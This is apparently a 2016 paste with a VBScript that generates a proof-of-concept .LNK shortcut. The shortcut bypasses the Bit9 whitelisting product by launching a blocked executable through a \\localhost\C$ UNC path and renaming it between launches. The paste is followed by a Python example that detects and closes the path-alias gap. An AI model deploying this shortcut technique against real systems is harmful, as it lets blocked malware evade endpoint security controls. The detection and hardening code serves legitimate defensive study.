waliedassar

Generated Custom .LNK File

Oct 13th, 2016
' Reported a bug in the Bit9 whitelisting solution, where
' a blacklisted/malicious executable (c:\test\test.exe) can bypass Bit9 if run via its UNC path "\\localhost\C$\any.exe" or any other
' UNC-equivalent path.
' The attack vector could be a .LNK or .PS1 file. I prefer .LNK since it is rarely blacklisted.
' The VBS script below generates a POC .LNK file that exploits that.
' We can also embed the malicious payload inside the .LNK file itself to have a standalone .LNK file.
' https://twitter.com/waleedassar
set WshShell = WScript.CreateObject("WScript.Shell")
set oShellLink = WshShell.CreateShortcut("B.Lnk")
oShellLink.TargetPath = "Cmd.exe"
oShellLink.Arguments = "/C start \\localhost\C$\test\test.exe & rename \\localhost\C$\test\test.exe test_1.exe & start \\localhost\C$\test\test_1.exe & rename \\localhost\C$\test\test_1.exe test_2.exe & start \\localhost\C$\test\test_2.exe & rename \\localhost\C$\test\test_2.exe test_3.exe & start \\localhost\C$\test\test_3.exe & rename \\localhost\C$\test\test_3.exe test_4.exe & start \\localhost\C$\test\test_4.exe & rename \\localhost\C$\test\test_4.exe test_5.exe"
oShellLink.WindowStyle = 1
oShellLink.IconLocation = "notepad.exe, 0"
oShellLink.Description = "Bit9 Bypass"
oShellLink.Save
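The weakness the comments describe is a path-based check that treats `\\localhost\C$\test\test.exe` and `C:\test\test.exe` as different files. The Python below is an added example written for this page (it is not code from the paste, and it does not reflect how Bit9 actually implements its checks): it canonicalizes loopback administrative-share UNC paths back to the local drive path, shows a naive path comparison beside the hardened one, and scans a command line such as the shortcut's `Arguments` string for local files reached through a UNC alias, which is the kind of check a detection rule over process-creation or LNK-argument data would make. The loopback host list and the `local_hostnames` parameter are assumptions of the example.

```python
import re

# Host names that refer back to the local machine. Assumed list for this
# example; a real check would also include the machine's own hostname/FQDN/IPs
# (passed here via local_hostnames).
LOOPBACK_HOSTS = {"localhost", "127.0.0.1", "::1", "."}

# Matches \\host\X$\rest and the long form \\?\UNC\host\X$\rest, i.e. a file
# addressed through a drive administrative share (C$, D$, ...).
_ADMIN_SHARE = re.compile(
    r"^\\\\(?:\?\\UNC\\)?(?P<host>[^\\]+)\\(?P<drive>[A-Za-z])\$(?P<rest>\\.*)?$",
    re.IGNORECASE,
)

# A UNC-looking token inside a command line (stops at whitespace and cmd.exe operators).
_UNC_TOKEN = re.compile(r'\\\\[^\s&|<>"]+')


def canonicalize(path, local_hostnames=()):
    """Return (canonical_path, via_loopback_unc).

    A loopback admin-share path is rewritten to the local drive path it names;
    anything else (plain local paths, genuinely remote shares) is returned unchanged.
    """
    m = _ADMIN_SHARE.match(path.strip())
    if not m:
        return path, False
    host = m.group("host").lower()
    if host not in LOOPBACK_HOSTS and host not in {h.lower() for h in local_hostnames}:
        return path, False  # remote share: not an alias of a local file
    rest = m.group("rest") or "\\"
    return m.group("drive").upper() + ":" + rest, True


def _key(path):
    # Case-insensitive comparison key, trailing separator ignored.
    return path.lower().rstrip("\\")


def naive_blocked(path, denylist):
    """Weak check: compares the path string as given, so a UNC alias slips past."""
    return _key(path) in {_key(d) for d in denylist}


def is_blocked(path, denylist, local_hostnames=()):
    """Hardened check: canonicalize both sides before comparing."""
    wanted = {_key(canonicalize(d, local_hostnames)[0]) for d in denylist}
    return _key(canonicalize(path, local_hostnames)[0]) in wanted


def loopback_refs(cmdline, local_hostnames=()):
    """Unique local paths that a command line reaches through a loopback UNC
    alias, in order of first appearance. Any hit is worth an alert on its own."""
    seen = []
    for token in _UNC_TOKEN.findall(cmdline):
        local, via_unc = canonicalize(token, local_hostnames)
        if via_unc and local not in seen:
            seen.append(local)
    return seen


# Constructed sample input: the Arguments string the paste's script writes into the shortcut.
SAMPLE_ARGS = (
    r"/C start \\localhost\C$\test\test.exe & rename \\localhost\C$\test\test.exe test_1.exe"
    r" & start \\localhost\C$\test\test_1.exe & rename \\localhost\C$\test\test_1.exe test_2.exe"
    r" & start \\localhost\C$\test\test_2.exe & rename \\localhost\C$\test\test_2.exe test_3.exe"
    r" & start \\localhost\C$\test\test_3.exe & rename \\localhost\C$\test\test_3.exe test_4.exe"
    r" & start \\localhost\C$\test\test_4.exe & rename \\localhost\C$\test\test_4.exe test_5.exe"
)

if __name__ == "__main__":
    deny = [r"C:\test\test.exe"]
    alias = r"\\localhost\C$\test\test.exe"
    print("naive:", naive_blocked(alias, deny), " hardened:", is_blocked(alias, deny))
    for local in loopback_refs(SAMPLE_ARGS):
        print("loopback UNC alias of local file:", local)
```

Canonicalization closes the alias gap, but note that the rename sequence in the sample arguments defeats any rule keyed on the path alone after the first launch; a denylist keyed on file hash is unaffected by either the UNC alias or the renames.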